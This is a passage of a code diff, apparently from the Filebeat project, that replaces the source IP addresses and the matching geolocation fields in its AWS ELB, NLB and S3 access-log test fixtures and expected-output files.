-2019-10-14T12:01:50.199250Z filebeat-aws-elb-test 77.227.156.41:52410 10.0.0.169:80 0.000039 0.001184 0.000028 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - -
-2019-10-14T12:01:50.831170Z filebeat-aws-elb-test 77.227.156.41:52414 10.0.1.185:80 0.000038 0.000787 0.000024 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - -
+2019-10-14T12:00:20.694172Z filebeat-aws-elb-test 175.16.199.1:54106 10.0.1.185:80 0.000043 0.000785 0.000023 200 200 0 612 "GET http://18.194.223.56:80/ HTTP/1.1" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" - -
+2019-10-14T12:01:41.918996Z filebeat-aws-elb-test 81.2.69.143:54001 10.0.0.169:80 0.000041 0.00491 0.000027 200 200 0 612 "GET http://18.194.223.56:80/ HTTP/1.1" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" - -
+2019-10-14T12:01:49.543250Z filebeat-aws-elb-test 81.2.69.193:52406 10.0.1.185:80 0.000041 0.00079 0.000024 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - -
+2019-10-14T12:01:50.199250Z filebeat-aws-elb-test 81.2.69.193:52410 10.0.0.169:80 0.000039 0.001184 0.000028 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - -
+2019-10-14T12:01:50.831170Z filebeat-aws-elb-test 81.2.69.193:52414 10.0.1.185:80 0.000038 0.000787 0.000024 200 200 0 612 "GET http://filebeat-aws-elb-test-1703142762.eu-central-1.elb.amazonaws.com:80/ HTTP/1.1" "curl/7.58.0" - -
 
diff --git a/x-pack/filebeat/module/aws/elb/test/elb-http.log-expected.json b/x-pack/filebeat/module/aws/elb/test/elb-http.log-expected.json
index 6f47911622a9..c727cc9d9345 100644
--- a/x-pack/filebeat/module/aws/elb/test/elb-http.log-expected.json
+++ b/x-pack/filebeat/module/aws/elb/test/elb-http.log-expected.json
@@ -25,17 +25,15 @@
         "input.type": "log",
         "log.offset": 0,
         "service.type": "aws",
-        "source.as.number": 35377,
-        "source.as.organization.name": "Ao a.b.n.",
-        "source.geo.city_name": "Moscow",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "78.24.182.42",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "source.port": "54106",
         "tags": [
             "forwarded"
@@ -79,17 +77,15 @@
         "input.type": "log",
         "log.offset": 271,
         "service.type": "aws",
-        "source.as.number": 43865,
-        "source.as.organization.name": "Intek-M LLC",
-        "source.geo.city_name": "Mytishchi",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.9089,
-        "source.geo.location.lon": 37.7339,
-        "source.geo.region_iso_code": "RU-MOS",
-        "source.geo.region_name": "Moscow Oblast",
-        "source.ip": "31.135.65.4",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": "54001",
         "tags": [
             "forwarded"
@@ -133,17 +129,15 @@
         "input.type": "log",
         "log.offset": 540,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "52406",
         "tags": [
             "forwarded"
@@ -182,19 +176,17 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 772,
+        "log.offset": 770,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "52410",
         "tags": [
             "forwarded"
@@ -233,19 +225,17 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 1005,
+        "log.offset": 1001,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "52414",
         "tags": [
             "forwarded"
diff --git a/x-pack/filebeat/module/aws/elb/test/elb-tcp.log b/x-pack/filebeat/module/aws/elb/test/elb-tcp.log
index 2ef0527debf4..bbb1acddc908 100644
--- a/x-pack/filebeat/module/aws/elb/test/elb-tcp.log
+++ b/x-pack/filebeat/module/aws/elb/test/elb-tcp.log
@@ -1,6 +1,6 @@
-2019-10-17T13:22:51.758784Z filebeat-aws-elb-test-elb 77.227.156.41:51600 10.0.0.47:80 0.000943 0.00001 0.000015 - - 134 859 "- - - " "-" - -
-2019-10-17T13:23:07.523763Z filebeat-aws-elb-test-elb 77.227.156.41:51726 10.0.1.184:80 0.000501 0.00001 0.000015 - - 134 859 "- - - " "-" - -
-2019-10-17T13:23:08.477627Z filebeat-aws-elb-test-elb 77.227.156.41:51734 10.0.0.47:80 0.001105 0.00001 0.000015 - - 134 859 "- - - " "-" - -
-2019-10-17T13:23:09.174797Z filebeat-aws-elb-test-elb 77.227.156.41:51738 10.0.1.184:80 0.000422 0.000009 0.000013 - - 134 859 "- - - " "-" - -
-2019-10-17T13:26:14.308385Z filebeat-aws-elb-test-elb 77.227.156.41:46288 10.0.0.47:80 0.000534 0.000011 0.000016 - - 7 343 "- - - " "-" - -
-2019-10-17T13:26:19.318250Z filebeat-aws-elb-test-elb 77.227.156.41:46304 10.0.1.184:80 0.001004 0.00001 0.000015 - - 17 343 "- - - " "-" - -
+2019-10-17T13:22:51.758784Z filebeat-aws-elb-test-elb 81.2.69.193:51600 10.0.0.47:80 0.000943 0.00001 0.000015 - - 134 859 "- - - " "-" - -
+2019-10-17T13:23:07.523763Z filebeat-aws-elb-test-elb 81.2.69.193:51726 10.0.1.184:80 0.000501 0.00001 0.000015 - - 134 859 "- - - " "-" - -
+2019-10-17T13:23:08.477627Z filebeat-aws-elb-test-elb 81.2.69.193:51734 10.0.0.47:80 0.001105 0.00001 0.000015 - - 134 859 "- - - " "-" - -
+2019-10-17T13:23:09.174797Z filebeat-aws-elb-test-elb 81.2.69.193:51738 10.0.1.184:80 0.000422 0.000009 0.000013 - - 134 859 "- - - " "-" - -
+2019-10-17T13:26:14.308385Z filebeat-aws-elb-test-elb 81.2.69.193:46288 10.0.0.47:80 0.000534 0.000011 0.000016 - - 7 343 "- - - " "-" - -
+2019-10-17T13:26:19.318250Z filebeat-aws-elb-test-elb 81.2.69.193:46304 10.0.1.184:80 0.001004 0.00001 0.000015 - - 17 343 "- - - " "-" - -
diff --git a/x-pack/filebeat/module/aws/elb/test/elb-tcp.log-expected.json b/x-pack/filebeat/module/aws/elb/test/elb-tcp.log-expected.json
index e960e2117638..9e6cca961379 100644
--- a/x-pack/filebeat/module/aws/elb/test/elb-tcp.log-expected.json
+++ b/x-pack/filebeat/module/aws/elb/test/elb-tcp.log-expected.json
@@ -19,18 +19,16 @@
         "input.type": "log",
         "log.offset": 0,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
         "source.bytes": 134,
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "51600",
         "tags": [
             "forwarded"
@@ -54,20 +52,18 @@
         "event.module": "aws",
         "fileset.name": "elb",
         "input.type": "log",
-        "log.offset": 142,
+        "log.offset": 140,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
         "source.bytes": 134,
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "51726",
         "tags": [
             "forwarded"
@@ -91,20 +87,18 @@
         "event.module": "aws",
         "fileset.name": "elb",
         "input.type": "log",
-        "log.offset": 285,
+        "log.offset": 281,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
         "source.bytes": 134,
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "51734",
         "tags": [
             "forwarded"
@@ -128,20 +122,18 @@
         "event.module": "aws",
         "fileset.name": "elb",
         "input.type": "log",
-        "log.offset": 427,
+        "log.offset": 421,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
         "source.bytes": 134,
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "51738",
         "tags": [
             "forwarded"
@@ -165,20 +157,18 @@
         "event.module": "aws",
         "fileset.name": "elb",
         "input.type": "log",
-        "log.offset": 571,
+        "log.offset": 563,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
         "source.bytes": 7,
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "46288",
         "tags": [
             "forwarded"
@@ -202,20 +192,18 @@
         "event.module": "aws",
         "fileset.name": "elb",
         "input.type": "log",
-        "log.offset": 712,
+        "log.offset": 702,
         "service.type": "aws",
-        "source.as.number": 12430,
-        "source.as.organization.name": "Vodafone Spain",
         "source.bytes": 17,
-        "source.geo.city_name": "Teruel",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 40.3456,
-        "source.geo.location.lon": -1.1065,
-        "source.geo.region_iso_code": "ES-TE",
-        "source.geo.region_name": "Teruel",
-        "source.ip": "77.227.156.41",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.193",
         "source.port": "46304",
         "tags": [
             "forwarded"
diff --git a/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log b/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log
index 3ff8e07a578c..d7e937a9e6f5 100644
--- a/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log
+++ b/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log
@@ -1,2 +1,2 @@
-tls 1.0 2018-12-20T02:59:40 net/my-network-loadbalancer/c6e77e28c25b2234 g3d4b5e8bb8464cd 72.21.218.154:51341 172.100.100.185:443 5 2 98 246 - arn:aws:acm:us-east-2:671290407336:certificate/2a108f19-aded-46b0-8493-c63eb1ef4a99 - ECDHE-RSA-AES128-SHA tlsv12 - my-network-loadbalancer-c6e77e28c25b2234.elb.us-east-2.amazonaws.com
+tls 1.0 2018-12-20T02:59:40 net/my-network-loadbalancer/c6e77e28c25b2234 g3d4b5e8bb8464cd 89.160.20.112:51341 172.100.100.185:443 5 2 98 246 - arn:aws:acm:us-east-2:671290407336:certificate/2a108f19-aded-46b0-8493-c63eb1ef4a99 - ECDHE-RSA-AES128-SHA tlsv12 - my-network-loadbalancer-c6e77e28c25b2234.elb.us-east-2.amazonaws.com
 
diff --git a/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log-expected.json b/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log-expected.json
index b5db726de69f..6a89bf9cb456 100644
--- a/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log-expected.json
+++ b/x-pack/filebeat/module/aws/elb/test/example-nlb-tcp.log-expected.json
@@ -24,18 +24,18 @@
         "input.type": "log",
         "log.offset": 0,
         "service.type": "aws",
-        "source.as.number": 16509,
-        "source.as.organization.name": "Amazon.com, Inc.",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
         "source.bytes": 98,
-        "source.geo.city_name": "Ashburn",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 39.0481,
-        "source.geo.location.lon": -77.4728,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "72.21.218.154",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "source.port": "51341",
         "tags": [
             "forwarded"
diff --git a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log
index e56b8a34ed9c..cd46507df71d 100644
--- a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log
+++ b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log
@@ -2,6 +2,6 @@
 36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 3 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2
 36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - "GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1" 200 - 265 - 2 1 "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2
 36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - "GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1" 200 - 142 - 4 - "-" "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2
-36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 77.227.156.41 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2
+36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 81.2.69.193 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2
 36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 174.29.206.152 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2
 67797214d75628047d9c76b18a78cded1a4b069b71f2a9d5a53649c38da8770b flow-log-test [14/Jul/2021:18:57:31 +0000] - svc:delivery.logs.amazonaws.com MVGXZXEVN3IG9S24 REST.PUT.OBJECT AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-_20210713T1855Z_f12aa632.log.gz "PUT /AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz HTTP/1.1" 200 - - 773 103 13 "-" "-" - 02SxwfXpO5UysN0GsKGa3uGDQ6E/W7+Hwo/luRH8p1VEexULoe66RCM+nja0dEq2JqLrtgjocvVRRkVt4= SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader flow-log-test.s3.us-gov-west-1.amazonaws.com TLSv1.2 -
diff --git a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json
index 80676a1b6cb0..f3999c8a14b1 100644
--- a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json
+++ b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json
@@ -36,14 +36,6 @@
             "access"
         ],
         "fileset.name": "s3access",
-        "geo.city_name": "Ashburn",
-        "geo.continent_name": "North America",
-        "geo.country_iso_code": "US",
-        "geo.country_name": "United States",
-        "geo.location.lat": 39.0481,
-        "geo.location.lon": -77.4728,
-        "geo.region_iso_code": "US-VA",
-        "geo.region_name": "Virginia",
         "http.request.method": "GET",
         "http.response.body.bytes": 142,
         "http.response.status_code": 200,
@@ -111,14 +103,6 @@
             "access"
         ],
         "fileset.name": "s3access",
-        "geo.city_name": "Ashburn",
-        "geo.continent_name": "North America",
-        "geo.country_iso_code": "US",
-        "geo.country_name": "United States",
-        "geo.location.lat": 39.0481,
-        "geo.location.lon": -77.4728,
-        "geo.region_iso_code": "US-VA",
-        "geo.region_name": "Virginia",
         "http.request.method": "GET",
         "http.response.body.bytes": 142,
         "http.response.status_code": 200,
@@ -187,14 +171,6 @@
             "access"
         ],
         "fileset.name": "s3access",
-        "geo.city_name": "Ashburn",
-        "geo.continent_name": "North America",
-        "geo.country_iso_code": "US",
-        "geo.country_name": "United States",
-        "geo.location.lat": 39.0481,
-        "geo.location.lon": -77.4728,
-        "geo.region_iso_code": "US-VA",
-        "geo.region_name": "Virginia",
         "http.request.method": "GET",
         "http.response.body.bytes": 265,
         "http.response.status_code": 200,
@@ -262,14 +238,6 @@
             "access"
         ],
         "fileset.name": "s3access",
-        "geo.city_name": "Ashburn",
-        "geo.continent_name": "North America",
-        "geo.country_iso_code": "US",
-        "geo.country_name": "United States",
-        "geo.location.lat": 39.0481,
-        "geo.location.lon": -77.4728,
-        "geo.region_iso_code": "US-VA",
-        "geo.region_name": "Virginia",
         "http.request.method": "GET",
         "http.response.body.bytes": 142,
         "http.response.status_code": 200,
@@ -312,13 +280,13 @@
         "aws.s3access.key": "jolokia-war-1.5.0.war",
         "aws.s3access.object_size": 344017,
         "aws.s3access.operation": "BATCH.DELETE.OBJECT",
-        "aws.s3access.remote_ip": "77.227.156.41",
+        "aws.s3access.remote_ip": "81.2.69.193",
         "aws.s3access.request_id": "8CD7A4A71E2E5C9E",
         "aws.s3access.requester": "arn:aws:iam::123456:user/test@elastic.co",
         "aws.s3access.signature_version": "SigV4",
         "aws.s3access.tls_version": "TLSv1.2",
-        "client.address": "77.227.156.41",
-        "client.ip": "77.227.156.41",
+        "client.address": "81.2.69.193",
+        "client.ip": "81.2.69.193",
         "client.user.id": "arn:aws:iam::123456:user/test@elastic.co",
         "cloud.provider": "aws",
         "cloud.region": "eu-central-1",
@@ -328,25 +296,25 @@
         "event.id": "8CD7A4A71E2E5C9E",
         "event.kind": "event",
         "event.module": "aws",
-        "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 77.227.156.41 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2",
+        "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 81.2.69.193 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2",
         "event.outcome": "success",
         "event.type": [
             "access"
         ],
         "fileset.name": "s3access",
-        "geo.city_name": "Teruel",
+        "geo.city_name": "London",
         "geo.continent_name": "Europe",
-        "geo.country_iso_code": "ES",
-        "geo.country_name": "Spain",
-        "geo.location.lat": 40.3456,
-        "geo.location.lon": -1.1065,
-        "geo.region_iso_code": "ES-TE",
-        "geo.region_name": "Teruel",
+        "geo.country_iso_code": "GB",
+        "geo.country_name": "United Kingdom",
+        "geo.location.lat": 51.5142,
+        "geo.location.lon": -0.0931,
+        "geo.region_iso_code": "GB-ENG",
+        "geo.region_name": "England",
         "http.response.status_code": 204,
         "input.type": "log",
         "log.offset": 2875,
         "related.ip": [
-            "77.227.156.41"
+            "81.2.69.193"
         ],
         "related.user": [
             "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2"
@@ -393,17 +361,9 @@
             "access"
         ],
         "fileset.name": "s3access",
-        "geo.city_name": "Denver",
-        "geo.continent_name": "North America",
-        "geo.country_iso_code": "US",
-        "geo.country_name": "United States",
-        "geo.location.lat": 39.7044,
-        "geo.location.lon": -105.0023,
-        "geo.region_iso_code": "US-CO",
-        "geo.region_name": "Colorado",
         "http.response.status_code": 204,
         "input.type": "log",
-        "log.offset": 3280,
+        "log.offset": 3278,
         "related.ip": [
             "174.29.206.152"
         ],
